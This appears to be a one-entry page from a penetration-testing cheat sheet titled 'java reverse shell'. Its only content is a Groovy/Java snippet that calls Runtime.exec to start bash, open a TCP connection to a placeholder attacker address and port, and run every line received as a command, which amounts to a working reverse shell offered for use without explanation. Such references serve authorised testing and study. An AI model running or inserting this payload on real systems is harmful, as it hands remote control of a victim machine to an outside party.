java_reverse_shell

JAVA REVERSE SHELL r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/MALICIOUS-IP/PORT;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[]) p.waitFor()

Last updated

Was this helpful?